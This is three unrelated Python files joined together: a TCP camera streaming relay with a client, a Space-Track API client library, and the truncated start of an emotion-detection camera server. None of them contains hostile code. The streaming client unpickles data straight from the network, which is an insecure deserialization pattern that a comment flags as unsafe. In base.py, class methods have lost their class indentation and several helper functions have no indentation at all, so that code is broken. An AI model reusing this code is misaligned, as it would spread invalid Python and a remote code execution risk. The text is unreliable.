# NOTE: dataset-table extraction artifact (columns "source" / "python") — not code.
# streaming.py
import cv2
import socket
import pickle
import struct
import threading
class StreamingServer:
    """TCP relay server for camera streams.

    Accepts client connections and re-broadcasts every chunk a client sends
    to all currently connected clients (including the sender).

    Attributes
    ----------
    Private:
        __host : str
            host address of the listening server
        __port : int
            port on which the server is listening
        __clients : list
            list of all connected client sockets
        __quit_key : chr
            key that has to be pressed to close connection
        __running : bool
            indicates if the server is already running or not
        __block : Lock
            a basic lock used for the synchronization of threads
        __server_socket : socket
            the main server socket

    Methods
    -------
    Private:
        __init_socket : binds the server socket to the host and port
        __server_listening : listens for new connections
        __client_connection : main method for processing the client streams
    Public:
        start_server : starts the server in a new thread
        stop_server : stops the server and closes all connections
    """

    def __init__(self, host, port, quit_key='q'):
        """
        Creates a new instance of StreamingServer.

        Parameters
        ----------
        host : str
            host address of the listening server
        port : int
            port on which the server is listening
        quit_key : chr
            key that has to be pressed to close connection (default = 'q')
        """
        self.__host = host
        self.__port = port
        self.__clients = []
        self.__running = False
        self.__quit_key = quit_key
        self.__block = threading.Lock()
        self.__server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.__init_socket()

    def __init_socket(self):
        """Binds the server socket to the given host and port."""
        self.__server_socket.bind((self.__host, self.__port))

    def start_server(self):
        """Starts the server in a background thread if it is not running already."""
        if self.__running:
            print("Server is already running")
        else:
            self.__running = True
            server_thread = threading.Thread(target=self.__server_listening)
            server_thread.start()
            print("Server started")

    def __server_listening(self):
        """Accepts new connections and spawns one handler thread per client."""
        self.__server_socket.listen()
        while self.__running:
            client_socket, _ = self.__server_socket.accept()
            self.__clients.append(client_socket)
            thread = threading.Thread(target=self.__client_connection,
                                      args=(client_socket,))
            thread.start()
            print("server: new client connected")

    def stop_server(self):
        """Stops the server and closes the listening socket."""
        if self.__running:
            self.__running = False
            # accept() blocks; open a throwaway connection to unblock it so
            # the listener thread can observe __running == False and exit.
            closing_connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            closing_connection.connect((self.__host, self.__port))
            closing_connection.close()
            self.__block.acquire()
            self.__server_socket.close()
            self.__block.release()
            print("Server stopped")
        else:
            print("Server not running!")

    def __client_connection(self, client_socket):
        """Relays one client's stream data to every connected client.

        Exits (and cleans up the socket) on clean EOF, on any socket error,
        or when the server stops.
        """
        while self.__running:
            try:
                received = client_socket.recv(4096)
            # BUGFIX: was a bare `except:`; all socket errors derive from
            # OSError, so catch only those instead of masking everything.
            except OSError:
                break
            if received == b'':
                # Clean EOF from the peer.
                break
            try:
                for client in self.__clients:
                    client.sendall(received)
            except OSError:
                break
        # BUGFIX: the original leaked the socket on clean EOF; always
        # deregister and close on the way out.
        if client_socket in self.__clients:
            self.__clients.remove(client_socket)
        client_socket.close()
        print("server: a client disconnected from server")
class StreamingClient:
    """Camera streaming and listening client.

    Streams local camera frames (JPEG, pickled, length-prefixed with a
    big-endian uint32) to the server, and displays frames received back
    from the server in an OpenCV window.

    Attributes
    ----------
    Private:
        __host : str
            host address to connect to
        __port : int
            port to connect to
        __running : bool
            indicates if the client is already listening or not
        __streaming : bool
            indicates if the client is already streaming or not
        __encoding_parameters : list
            a list of encoding parameters for OpenCV
        __client_socket : socket
            the main client socket
        __camera : VideoCapture
            the camera object
        __x_res : int
            the x resolution
        __y_res : int
            the y resolution
        __quit_key : chr
            key that has to be pressed to close connection

    Methods
    -------
    Private:
        __client_streaming : main method for streaming the client data
        __server_listening : main method for listening for server data
    Protected:
        _configure : sets basic configurations
        _get_frame : returns the camera frame to be sent to the server
        _cleanup : cleans up all the resources and closes everything
    Public:
        start_streaming : starts the camera stream in a new thread
        start_listening : starts the server listener in a new thread
        stop_stream : stops the camera stream
        disconnect : disconnects from the server
    """

    def __init__(self, host, port, x_res=1024, y_res=576, quit_key='q'):
        """
        Creates a new instance of StreamingClient.

        Parameters
        ----------
        host : str
            host address to connect to
        port : int
            port to connect to
        x_res : int
            x resolution of the stream (default = 1024)
        y_res : int
            y resolution of the stream (default = 576)
        quit_key : chr
            key that has to be pressed to close connection (default = 'q')
        """
        self.__host = host
        self.__port = port
        self.__x_res = x_res
        self.__y_res = y_res
        self.__quit_key = quit_key
        self.__camera = cv2.VideoCapture(0)
        self._configure()
        self.__running = False
        self.__streaming = False
        self.__client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def _configure(self):
        """Sets the camera resolution and the JPEG encoding parameters."""
        self.__camera.set(3, self.__x_res)  # 3 == cv2.CAP_PROP_FRAME_WIDTH
        self.__camera.set(4, self.__y_res)  # 4 == cv2.CAP_PROP_FRAME_HEIGHT
        self.__encoding_parameters = [int(cv2.IMWRITE_JPEG_QUALITY), 90]

    def _get_frame(self):
        """
        Gets the next camera frame.

        Returns
        -------
        frame : ndarray or None
            the next camera frame, or None if the capture failed
        """
        ret, frame = self.__camera.read()
        # VideoCapture.read() returns (False, None) on failure.
        return frame if ret else None

    def _cleanup(self):
        """Releases the camera and closes all OpenCV windows."""
        self.__camera.release()
        cv2.destroyAllWindows()

    def __client_streaming(self, connection):
        """Captures, encodes and sends camera frames until stopped."""
        while self.__streaming:
            frame = self._get_frame()
            if frame is None:
                # BUGFIX: a failed camera read previously crashed
                # cv2.imencode with a None frame; stop streaming instead.
                self.__streaming = False
                break
            result, frame = cv2.imencode('.jpg', frame, self.__encoding_parameters)
            data = pickle.dumps(frame, 0)
            size = len(data)
            try:
                connection.sendall(struct.pack('>L', size) + data)
            except (ConnectionResetError, ConnectionAbortedError, BrokenPipeError):
                self.__streaming = False
        self._cleanup()

    def __server_listening(self, connection, address):
        """Receives length-prefixed frames from the server and displays them."""
        payload_size = struct.calcsize('>L')
        data = b""
        while self.__running:
            break_loop = False
            while len(data) < payload_size:
                received = connection.recv(4096)
                if received == b'':
                    # BUGFIX: removed `self.__used_slots -= 1` — that
                    # attribute was never initialized in this class and
                    # raised AttributeError on every disconnect.
                    connection.close()
                    break_loop = True
                    break
                data += received
            if break_loop:
                break
            packed_msg_size = data[:payload_size]
            data = data[payload_size:]
            msg_size = struct.unpack(">L", packed_msg_size)[0]
            while len(data) < msg_size:
                chunk = connection.recv(4096)
                if chunk == b'':
                    # BUGFIX: previously looped forever if the peer died
                    # mid-frame (recv returning b'' repeatedly).
                    break_loop = True
                    break
                data += chunk
            if break_loop:
                connection.close()
                break
            frame_data = data[:msg_size]
            data = data[msg_size:]
            # SECURITY NOTE: pickle.loads on network data is unsafe against
            # untrusted peers; only use with a trusted server.
            frame = pickle.loads(frame_data, fix_imports=True, encoding="bytes")
            frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)
            cv2.imshow(str(address), frame)
            if cv2.waitKey(1) == ord(self.__quit_key):
                connection.close()
                break

    def start_listening(self):
        """Connects to the server and starts the listener thread."""
        if self.__running:
            print("Client is already connected!")
        else:
            self.__running = True
            self.__client_socket.connect((self.__host, self.__port))
            address = self.__client_socket.getsockname()
            listening_thread = threading.Thread(
                target=self.__server_listening,
                args=(self.__client_socket, address,))
            listening_thread.start()
            print("Client is now connected to {}:{}".format(self.__host, self.__port))

    def start_streaming(self):
        """Starts the camera stream in a new thread."""
        if self.__streaming:
            print("Client is already streaming!")
        else:
            self.__streaming = True
            thread = threading.Thread(target=self.__client_streaming,
                                      args=(self.__client_socket,))
            thread.start()
            print("Client is now streaming!")

    def stop_stream(self):
        """Stops the client stream if running."""
        if self.__streaming:
            self.__streaming = False
            print("Client is now stopped streaming!")
        else:
            print("Client not streaming!")

    def disconnect(self):
        """Disconnects the client from the server."""
        if self.__running:
            self.__running = False
            self.__client_socket.close()
            print("Client is now disconnected!")
        else:
            print("Client not connected!")
# --- end of streaming.py (dataset cell delimiter removed) ---
# base.py
import re
import threading
import time
import warnings
import weakref
from collections.abc import Mapping
from collections import OrderedDict
from functools import partial
import requests
from dateutil.parser import isoparse
from logbook import Logger
from represent import ReprHelper, ReprHelperMixin
from rush.quota import Quota
from rush.throttle import Throttle
from rush.limiters.periodic import PeriodicLimiter
from rush.stores.dictionary import DictionaryStore as RushDictionaryStore
from .operators import _stringify_predicate_value
logger = Logger('spacetrack')
type_re = re.compile(r'(\w+)')
enum_re = re.compile(r"""
enum\(
'(\w+)' # First value
(?:, # Subsequent values optional
'(\w+)' # Capture string
)*
\)
""", re.VERBOSE)
BASE_URL = 'https://www.space-track.org/'
class AuthenticationError(Exception):
    """Raised when Space-Track rejects the supplied login credentials."""


class UnknownPredicateTypeWarning(RuntimeWarning):
    """Emitted when a modeldef reports a predicate type this library doesn't know."""
class Predicate(ReprHelperMixin):
    """Hold Space-Track predicate information.

    The current goal of this class is to print the repr for the user.
    """

    def __init__(self, name, type_, nullable=False, default=None, values=None):
        self.name = name
        self.type_ = type_
        self.nullable = nullable
        self.default = default
        # Values can be set e.g. for enum predicates.
        self.values = values

    def _repr_helper_(self, helper):
        helper.keyword_from_attr('name')
        helper.keyword_from_attr('type_')
        helper.keyword_from_attr('nullable')
        helper.keyword_from_attr('default')
        if self.values is not None:
            helper.keyword_from_attr('values')

    def parse(self, value):
        """Convert a raw string value according to this predicate's type_.

        Unknown types (and None values) pass through unchanged.
        """
        if value is None:
            return None
        converters = {
            'float': float,
            'int': int,
            'datetime': isoparse,
            'date': lambda raw: isoparse(raw).date(),
        }
        convert = converters.get(self.type_)
        return convert(value) if convert is not None else value
class SpaceTrackClient:
    """SpaceTrack client class.

    Parameters:
        identity: Space-Track username.
        password: Space-Track password.
        base_url: May be overridden to use e.g. https://testing.space-track.org/
        rush_store: A :mod:`rush` storage backend. By default, a
            :class:`~rush.stores.dictionary.DictionaryStore` is used. You may
            wish to use :class:`~rush.stores.dictionary.RedisStore` to
            follow rate limits from multiple instances.
        rush_key_prefix: You may choose a prefix for the keys that will be
            stored in `rush_store`, e.g. to avoid conflicts in a redis db.

    For more information, refer to the `Space-Track documentation`_.

    .. _`Space-Track documentation`: https://www.space-track.org/documentation
        #api-requestClasses

    .. data:: request_controllers

        Ordered dictionary of request controllers and their request classes in
        the following order.

        - `basicspacedata`
        - `expandedspacedata`
        - `fileshare`
        - `spephemeris`

        For example, if the ``spacetrack.file`` method is used without
        specifying which controller, the client will choose the `fileshare`
        controller (which comes before `spephemeris`).

    .. note::

        If new request classes and/or controllers are added to the
        Space-Track API but not yet to this library, you can safely
        subclass :class:`SpaceTrackClient` with a copy of this ordered
        dictionary to add them.

        That said, please open an issue on `GitHub`_ for me to add them to
        the library.

        .. _`GitHub`: https://github.com/python-astrodynamics/spacetrack
    """

    # "request class" methods will be looked up by request controller in this
    # order
    request_controllers = OrderedDict.fromkeys([
        'basicspacedata',
        'expandedspacedata',
        'fileshare',
        'spephemeris',
    ])
    request_controllers['basicspacedata'] = {
        'announcement',
        'boxscore',
        'cdm_public',
        'decay',
        'gp',
        'gp_history',
        'launch_site',
        'omm',
        'satcat',
        'satcat_change',
        'satcat_debut',
        'tip',
        'tle',
        'tle_latest',
        'tle_publish',
    }
    request_controllers['expandedspacedata'] = {
        'car',
        'cdm',
        'maneuver',
        'maneuver_history',
        'organization',
        'satellite',
    }
    request_controllers['fileshare'] = {
        'delete',
        'download',
        'file',
        'folder',
        'upload',
    }
    request_controllers['spephemeris'] = {
        'download',
        'file',
        'file_history',
    }

    # List of (class, controller) tuples for
    # requests which do not return a modeldef; the set value holds the
    # keyword arguments accepted despite there being no modeldef to query.
    offline_predicates = {
        ('upload', 'fileshare'): {'folder_id', 'file'},
        ('download', 'spephemeris'): set(),
    }

    # These predicates are available for every request class.
    rest_predicates = {
        Predicate('predicates', 'str'),
        Predicate('metadata', 'enum', values=('true', 'false')),
        Predicate('limit', 'str'),
        Predicate('orderby', 'str'),
        Predicate('distinct', 'enum', values=('true', 'false')),
        Predicate(
            'format', 'enum',
            values=('json', 'xml', 'html', 'csv', 'tle', '3le', 'kvn', 'stream')),
        Predicate('emptyresult', 'enum', values=('show',)),
        Predicate('favorites', 'str'),
    }
def __init__(
    self,
    identity,
    password,
    base_url=BASE_URL,
    rush_store=None,
    rush_key_prefix='',
):
    """Create a client; see the class docstring for parameter meanings."""
    #: :class:`requests.Session` instance. It can be mutated to configure
    #: e.g. proxies.
    self.session = self._create_session()
    self.identity = identity
    self.password = password
    # Normalise so URL construction elsewhere can simply concatenate.
    if not base_url.endswith('/'):
        base_url += '/'
    self.base_url = base_url
    # If set, this will be called when we sleep for the rate limit.
    self.callback = None
    # Flipped to True by authenticate() after a successful login.
    self._authenticated = False
    # class_ -> [Predicate] cache, filled by get_predicates().
    self._predicates = dict()
    # controller name -> _ControllerProxy cache, used by __getattr__.
    self._controller_proxies = dict()
    # From https://www.space-track.org/documentation#/api:
    # Space-track throttles API use in order to maintain consistent
    # performance for all users. To avoid error messages, please limit
    # your query frequency.
    # Limit API queries to less than 30 requests per minute / 300 requests
    # per hour
    if rush_store is None:
        rush_store = RushDictionaryStore()
    # Both throttles share one limiter; they differ only in quota/key.
    limiter = PeriodicLimiter(rush_store)
    self._per_minute_throttle = Throttle(
        limiter=limiter,
        rate=Quota.per_minute(30),
    )
    self._per_hour_throttle = Throttle(
        limiter=limiter,
        rate=Quota.per_hour(300),
    )
    self._per_minute_key = rush_key_prefix + 'st_req_min'
    self._per_hour_key = rush_key_prefix + 'st_req_hr'
def _ratelimit_callback(self, until):
    """Log the imminent rate-limit sleep and notify the user callback, if any."""
    remaining = int(round(until - time.monotonic()))
    logger.info('Rate limit reached. Sleeping for {:d} seconds.', remaining)
    callback = self.callback
    if callback is not None:
        callback(until)
@staticmethod
def _create_session():
    """Return the HTTP session used for all web access.

    Overridden in :class:`spacetrack.aio.AsyncSpaceTrackClient` to use
    :mod:`aiohttp` instead of :mod:`requests`.
    """
    session = requests.Session()
    return session
def authenticate(self):
    """Authenticate with Space-Track.

    Raises:
        spacetrack.base.AuthenticationError: Incorrect login details.

    .. note::

        This method is called automatically when required.
    """
    if not self._authenticated:
        login_url = self.base_url + 'ajaxauth/login'
        data = {'identity': self.identity, 'password': self.password}
        resp = self.session.post(login_url, data=data)
        _raise_for_status(resp)
        # If login failed, we get a JSON response with {'Login': 'Failed'}
        resp_data = resp.json()
        if isinstance(resp_data, Mapping):
            if resp_data.get('Login', None) == 'Failed':
                raise AuthenticationError()
        self._authenticated = True
def generic_request(self, class_, iter_lines=False, iter_content=False,
                    controller=None, parse_types=False, **kwargs):
    r"""Generic Space-Track query.

    The request class methods use this method internally; the public
    API is as follows:

    .. code-block:: python

        st.tle_publish(*args, **kw)
        st.basicspacedata.tle_publish(*args, **kw)
        st.file(*args, **kw)
        st.fileshare.file(*args, **kw)
        st.spephemeris.file(*args, **kw)

    They resolve to the following calls respectively:

    .. code-block:: python

        st.generic_request('tle_publish', *args, **kw)
        st.generic_request('tle_publish', *args, controller='basicspacedata', **kw)
        st.generic_request('file', *args, **kw)
        st.generic_request('file', *args, controller='fileshare', **kw)
        st.generic_request('file', *args, controller='spephemeris', **kw)

    Parameters:
        class\_: Space-Track request class name
        iter_lines: Yield result line by line
        iter_content: Yield result in 100 KiB chunks.
        controller: Optionally specify request controller to use.
        parse_types: Parse string values in response according to type given
            in predicate information, e.g. ``'2017-01-01'`` ->
            ``datetime.date(2017, 1, 1)``.
        **kwargs: These keywords must match the predicate fields on
            Space-Track. You may check valid keywords with the following
            snippet:

            .. code-block:: python

                spacetrack = SpaceTrackClient(...)
                spacetrack.tle.get_predicates()
                # or
                spacetrack.get_predicates('tle')

            See :func:`~spacetrack.operators._stringify_predicate_value` for
            which Python objects are converted appropriately.

    Yields:
        Lines—stripped of newline characters—if ``iter_lines=True``

    Yields:
        100 KiB chunks if ``iter_content=True``

    Returns:
        Parsed JSON object, unless ``format`` keyword argument is passed.

    .. warning::

        Passing ``format='json'`` will return the JSON **unparsed**. Do
        not set ``format`` if you want the parsed JSON object returned!
    """
    if iter_lines and iter_content:
        raise ValueError('iter_lines and iter_content cannot both be True')
    if 'format' in kwargs and parse_types:
        raise ValueError('parse_types can only be used if format is unset.')
    if controller is None:
        controller = self._find_controller(class_)
    else:
        classes = self.request_controllers.get(controller, None)
        if classes is None:
            raise ValueError(f'Unknown request controller {controller!r}')
        if class_ not in classes:
            raise ValueError(
                f'Unknown request class {class_!r} for controller {controller!r}')
    # Decode unicode unless class == download, including conversion of
    # CRLF newlines to LF.
    decode = (class_ != 'download')
    if not decode and iter_lines:
        error = (
            'iter_lines disabled for binary data, since CRLF newlines '
            'split over chunk boundaries would yield extra blank lines. '
            'Use iter_content=True instead.')
        raise ValueError(error)
    self.authenticate()
    url = f'{self.base_url}{controller}/query/class/{class_}'
    offline_check = (class_, controller) in self.offline_predicates
    # Predicates valid for every request class (limit, orderby, format, ...).
    valid_fields = {p.name for p in self.rest_predicates}
    predicates = None
    if not offline_check:
        # Validate keyword argument names by querying valid predicates from
        # Space-Track
        predicates = self.get_predicates(class_, controller)
        predicate_fields = {p.name for p in predicates}
        valid_fields |= predicate_fields
    else:
        valid_fields |= self.offline_predicates[(class_, controller)]
    for key, value in kwargs.items():
        if key not in valid_fields:
            raise TypeError(f"'{class_}' got an unexpected argument '{key}'")
        if class_ == 'upload' and key == 'file':
            # 'file' is sent as multipart form data below, not as a URL segment.
            continue
        value = _stringify_predicate_value(value)
        url += f'/{key}/{value}'
    logger.debug(requests.utils.requote_uri(url))
    if class_ == 'upload':
        if 'file' not in kwargs:
            raise TypeError("missing keyword argument: 'file'")
        resp = self.session.post(url, files={'file': kwargs['file']})
    else:
        resp = self._ratelimited_get(url, stream=iter_lines or iter_content)
    _raise_for_status(resp)
    if resp.encoding is None:
        resp.encoding = 'UTF-8'
    if iter_lines:
        return _iter_lines_generator(resp, decode_unicode=decode)
    elif iter_content:
        return _iter_content_generator(resp, decode_unicode=decode)
    else:
        # If format is specified, return that format unparsed. Otherwise,
        # parse the default JSON response.
        if 'format' in kwargs:
            if decode:
                data = resp.text
                # Replace CRLF newlines with LF, Python will handle platform
                # specific newlines if written to file.
                data = data.replace('\r\n', '\n')
            else:
                data = resp.content
            return data
        else:
            data = resp.json()
            if predicates is None or not parse_types:
                return data
            else:
                return self._parse_types(data, predicates)
@staticmethod
def _parse_types(data, predicates):
    """Parse string values in each row of data according to its predicate's type."""
    by_name = {p.name: p for p in predicates}
    for row in data:
        for key, value in row.items():
            predicate = by_name.get(key.lower())
            if predicate is not None:
                row[key] = predicate.parse(value)
    return data
def _ratelimited_get(self, *args, **kwargs):
    """Perform get request, handling rate limiting.

    Sleeps first if either the per-minute or per-hour quota is exhausted,
    and retries once if Space-Track still reports a rate-limit violation.
    """
    minute_limit = self._per_minute_throttle.check(self._per_minute_key, 1)
    hour_limit = self._per_hour_throttle.check(self._per_hour_key, 1)
    # Sleep for the longer of the two retry-after intervals.
    sleep_time = 0
    if minute_limit.limited:
        sleep_time = minute_limit.retry_after.total_seconds()
    if hour_limit.limited:
        sleep_time = max(sleep_time, hour_limit.retry_after.total_seconds())
    if sleep_time > 0:
        self._ratelimit_wait(sleep_time)
    resp = self.session.get(*args, **kwargs)
    # It's possible that Space-Track will return HTTP status 500 with a
    # query rate limit violation. This can happen if a script is cancelled
    # before it has finished sleeping to satisfy the rate limit and it is
    # started again.
    #
    # Let's catch this specific instance and retry once if it happens.
    if resp.status_code == 500:
        # Let's only retry if the error page tells us it's a rate limit
        # violation.
        if 'violated your query rate limit' in resp.text:
            # It seems that only the per-minute rate limit causes an HTTP
            # 500 error. Breaking the per-hour limit seems to result in an
            # email from Space-Track instead.
            self._ratelimit_wait(
                self._per_minute_throttle.rate.period.total_seconds()
            )
            resp = self.session.get(*args, **kwargs)
    return resp
def _ratelimit_wait(self, duration):
    """Sleep for `duration` seconds, firing _ratelimit_callback in a daemon thread."""
    deadline = time.monotonic() + duration
    notifier = threading.Thread(target=self._ratelimit_callback, args=(deadline,))
    notifier.daemon = True
    notifier.start()
    time.sleep(duration)
def __getattr__(self, attr):
    """Dynamically resolve request controllers and request classes.

    ``st.fileshare`` returns a cached :class:`_ControllerProxy`;
    ``st.tle`` returns a callable bound to :meth:`generic_request` with
    the controller resolved by :meth:`_find_controller`. Raises
    AttributeError for names that are neither.
    """
    if attr in self.request_controllers:
        # Controller proxies are cached per client instance.
        controller_proxy = self._controller_proxies.get(attr)
        if controller_proxy is None:
            controller_proxy = _ControllerProxy(self, attr)
            self._controller_proxies[attr] = controller_proxy
        return controller_proxy
    try:
        controller = self._find_controller(attr)
    except ValueError:
        raise AttributeError(
            f"'{self.__class__.__name__}' object has no attribute '{attr}'")
    # generic_request can resolve the controller itself, but we
    # pass it because we have to check if the class_ is owned
    # by a controller here anyway.
    function = partial(
        self.generic_request, class_=attr, controller=controller)
    function.get_predicates = partial(
        self.get_predicates, class_=attr, controller=controller)
    return function
def __dir__(self):
    """Include request controllers and request classes for introspection."""
    names = list(self.__dict__)
    # Deduplicate classes shared between controllers (e.g. 'download').
    unique_classes = {
        class_
        for classes in self.request_controllers.values()
        for class_ in classes
    }
    names.extend(unique_classes)
    names.extend(self.request_controllers)
    return sorted(names)
def _find_controller(self, class_):
    """Return the first controller whose class set contains ``class_``.

    Order is specified by the keys of
    ``SpaceTrackClient.request_controllers``
    (:class:`~collections.OrderedDict`). Raises ValueError if no
    controller owns the class.
    """
    match = next(
        (controller
         for controller, classes in self.request_controllers.items()
         if class_ in classes),
        None,
    )
    if match is None:
        raise ValueError(f'Unknown request class {class_!r}')
    return match
def _download_predicate_data(self, class_, controller):
    """Fetch the raw modeldef rows for ``class_`` from the given controller."""
    self.authenticate()
    url = f'{self.base_url}{controller}/modeldef/class/{class_}'
    logger.debug(requests.utils.requote_uri(url))
    response = self._ratelimited_get(url)
    _raise_for_status(response)
    return response.json()['data']
def get_predicates(self, class_, controller=None):
    """Get full predicate information for given request class, and cache
    for subsequent calls.

    Raises ValueError for unknown controllers or request classes.
    """
    if class_ not in self._predicates:
        if controller is None:
            # Fall back to the first controller that owns this class.
            controller = self._find_controller(class_)
        else:
            classes = self.request_controllers.get(controller, None)
            if classes is None:
                raise ValueError(
                    f'Unknown request controller {controller!r}')
            if class_ not in classes:
                raise ValueError(
                    f'Unknown request class {class_!r}')
        predicates_data = self._download_predicate_data(class_, controller)
        predicate_objects = self._parse_predicates_data(predicates_data)
        self._predicates[class_] = predicate_objects
    return self._predicates[class_]
def _parse_predicates_data(self, predicates_data):
    """Convert raw modeldef rows into :class:`Predicate` objects.

    Parameters:
        predicates_data: iterable of dicts with 'Field', 'Type', 'Null'
            and 'Default' keys, as returned by _download_predicate_data.

    Returns:
        list of Predicate.

    Raises:
        ValueError: if a field or enum type cannot be parsed.

    Warns:
        UnknownPredicateTypeWarning: for SQL types not in the map below.
    """
    # Map of SQL column type name -> Predicate type. PERF: hoisted out of
    # the loop — the original rebuilt this dict literal for every field.
    types = {
        # Strings
        'char': 'str',
        'varchar': 'str',
        'longtext': 'str',
        'text': 'str',
        # varbinary only used for 'file' request class, for the
        # 'file_link' predicate.
        'varbinary': 'str',
        # Integers
        'bigint': 'int',
        'int': 'int',
        'tinyint': 'int',
        'smallint': 'int',
        'mediumint': 'int',
        # Floats
        'decimal': 'float',
        'float': 'float',
        'double': 'float',
        # Date/Times
        'date': 'date',
        'timestamp': 'datetime',
        'datetime': 'datetime',
        # Enum
        'enum': 'enum',
        # Bytes
        'longblob': 'bytes',
    }
    predicate_objects = []
    for field in predicates_data:
        full_type = field['Type']
        type_match = type_re.match(full_type)
        if not type_match:
            raise ValueError(
                f"Couldn't parse field type '{full_type}'")
        type_name = type_match.group(1)
        field_name = field['Field'].lower()
        nullable = (field['Null'] == 'YES')
        default = field['Default']
        if type_name not in types:
            warnings.warn(
                f'Unknown predicate type {type_name!r}',
                UnknownPredicateTypeWarning,
            )
        predicate = Predicate(
            name=field_name,
            # Unknown types fall through unchanged so parse() passes
            # their values through verbatim.
            type_=types.get(type_name, type_name),
            nullable=nullable,
            default=default)
        if type_name == 'enum':
            enum_match = enum_re.match(full_type)
            if not enum_match:
                raise ValueError(
                    f"Couldn't parse enum type '{full_type}'")
            # match.groups() doesn't work for repeating groups, use findall
            predicate.values = tuple(re.findall(r"'(\w+)'", full_type))
        predicate_objects.append(predicate)
    return predicate_objects
def __repr__(self):
    # e.g. <SpaceTrackClient identity='user@example.com'>
    r = ReprHelper(self)
    # NOTE(review): 'parantheses' (sic) appears to be the attribute name
    # used by the `represent` library itself — confirm before "fixing".
    r.parantheses = ('<', '>')
    r.keyword_from_attr('identity')
    return str(r)
class _ControllerProxy:
    """Proxies request class methods with a preset request controller."""

    def __init__(self, client, controller):
        # The client will cache _ControllerProxy instances, so only store
        # a weak reference to it.
        self.client = weakref.proxy(client)
        self.controller = controller

    def __getattr__(self, attr):
        # Only request classes belonging to this controller are exposed.
        if attr not in self.client.request_controllers[self.controller]:
            raise AttributeError(f"'{self!r}' object has no attribute '{attr}'")
        # Bind class_ and controller so the returned callable mirrors
        # SpaceTrackClient.__getattr__'s behaviour.
        function = partial(
            self.client.generic_request, class_=attr,
            controller=self.controller)
        function.get_predicates = partial(
            self.client.get_predicates, class_=attr,
            controller=self.controller)
        return function

    def __repr__(self):
        # e.g. <_ControllerProxy controller='fileshare'>
        r = ReprHelper(self)
        # NOTE(review): 'parantheses' (sic) appears to be the attribute
        # name used by the `represent` library itself.
        r.parantheses = ('<', '>')
        r.keyword_from_attr('controller')
        return str(r)

    def get_predicates(self, class_):
        """Proxy ``get_predicates`` to client with stored request
        controller.
        """
        return self.client.get_predicates(
            class_=class_, controller=self.controller)
def _iter_content_generator(response, decode_unicode):
"""Generator used to yield 100 KiB chunks for a given response."""
for chunk in response.iter_content(100 * 1024, decode_unicode=decode_unicode):
if decode_unicode:
# Replace CRLF newlines with LF, Python will handle
# platform specific newlines if written to file.
chunk = chunk.replace('\r\n', '\n')
# Chunk could be ['...\r', '\n...'], stril trailing \r
chunk = chunk.rstrip('\r')
yield chunk
def _iter_lines_generator(response, decode_unicode):
"""Iterates over the response data, one line at a time. When
stream=True is set on the request, this avoids reading the
content at once into memory for large responses.
The function is taken from :meth:`requests.models.Response.iter_lines`, but
modified to use our :func:`~spacetrack.base._iter_content_generator`. This
is because Space-Track uses CRLF newlines, so :meth:`str.splitlines` can
cause us to yield blank lines if one chunk ends with CR and the next one
starts with LF.
.. note:: This method is not reentrant safe.
"""
pending = None
for chunk in _iter_content_generator(response, decode_unicode=decode_unicode):
if pending is not None:
chunk = pending + chunk
lines = chunk.splitlines()
if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]:
pending = lines.pop()
else:
pending = None
yield from lines
if pending is not None:
yield pending
def _raise_for_status(response):
"""Raises stored :class:`HTTPError`, if one occurred.
This is the :meth:`requests.models.Response.raise_for_status` method,
modified to add the response from Space-Track, if given.
"""
http_error_msg = ''
if 400 <= response.status_code < 500:
http_error_msg = (
f'{response.status_code} Client Error: {response.reason} '
f'for url: {response.url}'
)
elif 500 <= response.status_code < 600:
http_error_msg = (
f'{response.status_code} Server Error: {response.reason} '
f'for url: {response.url}'
)
if http_error_msg:
spacetrack_error_msg = None
try:
json = response.json()
if isinstance(json, Mapping):
spacetrack_error_msg = json['error']
except (ValueError, KeyError):
pass
if not spacetrack_error_msg:
spacetrack_error_msg = response.text
if spacetrack_error_msg:
http_error_msg += '\nSpace-Track response:\n' + spacetrack_error_msg
raise requests.HTTPError(http_error_msg, response=response)
# --- end of base.py (dataset cell delimiter removed) ---
# server.py
import sys
sys.path.insert(0, '/home/mendel/emotion-mesh/cloud-detector')
sys.path.append('db')
import base64
import contextlib
import hashlib
import io
import os
import logging
import queue
import select
import socket
import struct
import subprocess
import threading
import time
from shutil import copyfile, move
from detect_face import perform_cloud_detection
from enum import Enum
from http.server import BaseHTTPRequestHandler
from itertools import cycle
import globals
from .db import emotionBackend
from .proto import messages_pb2 as pb2
# Module-level logger for the camera/WebSocket server.
logger = logging.getLogger(__name__)
class NAL:
    """H.264 NAL unit type codes used by this server."""

    CODED_SLICE_NON_IDR = 1  # Coded slice of a non-IDR picture
    CODED_SLICE_IDR = 5      # Coded slice of an IDR picture
    SEI = 6                  # Supplemental enhancement information (SEI)
    SPS = 7                  # Sequence parameter set
    PPS = 8                  # Picture parameter set


# The NAL unit types this server passes through.
ALLOWED_NALS = {
    NAL.CODED_SLICE_NON_IDR,
    NAL.CODED_SLICE_IDR,
    NAL.SPS,
    NAL.PPS,
    NAL.SEI,
}
# Each factory below wraps its payload in a ClientBound protobuf message
# stamped with the current monotonic clock in microseconds.
# NOTE(review): time.monotonic() has an arbitrary epoch, so these
# timestamps are only comparable within a single process run.

def StartMessage(resolution):
    """ClientBound Start message announcing the stream (width, height)."""
    width, height = resolution
    return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
                           start=pb2.Start(width=width, height=height))


def StopMessage():
    """ClientBound Stop message."""
    return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
                           stop=pb2.Stop())


def VideoMessage(data):
    """ClientBound Video message carrying raw encoded video bytes."""
    return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
                           video=pb2.Video(data=data))


def OverlayMessage(svg):
    """ClientBound Overlay message carrying an SVG overlay."""
    return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
                           overlay=pb2.Overlay(svg=svg))


def ProcessingMessage():
    """ClientBound Processing message (detection in progress)."""
    return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
                           processing=pb2.Processing())


def DetectionResultMessage(imagePath, emotionResult):
    """ClientBound DetectionResult message with the captured image path and result."""
    return pb2.ClientBound(timestamp_us=int(time.monotonic() * 1000000),
                           detectionResult=pb2.DetectionResult(imagePath=imagePath, emotionResult=emotionResult))


def ResetMessage():
    """ClientBound Reset message."""
